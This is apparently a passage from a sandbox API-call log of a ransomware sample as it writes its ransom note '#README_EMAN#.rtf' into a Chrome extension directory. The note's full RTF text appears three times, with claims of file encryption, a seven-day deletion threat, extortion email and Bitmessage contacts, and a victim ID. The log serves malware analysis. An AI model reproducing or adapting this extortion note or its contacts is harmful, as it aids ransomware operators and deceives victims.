p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\n¯óÈgÑãHÐ\x09K¨?ìc¥àÛ©ü\x0c¥ñs\x01", lpUsedDefaultChar=0x0) returned 8717 [0284.757] WriteFile (in: hFile=0x228, lpBuffer=0x248aaf8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x248aaf8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0284.757] CloseHandle (hObject=0x228) returned 1 [0284.757] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\#readme_eman#.rtf")) returned 0xffffffff [0284.757] GetLastError () returned 0x2 [0284.757] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x284 [0284.829] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.829] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.829] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 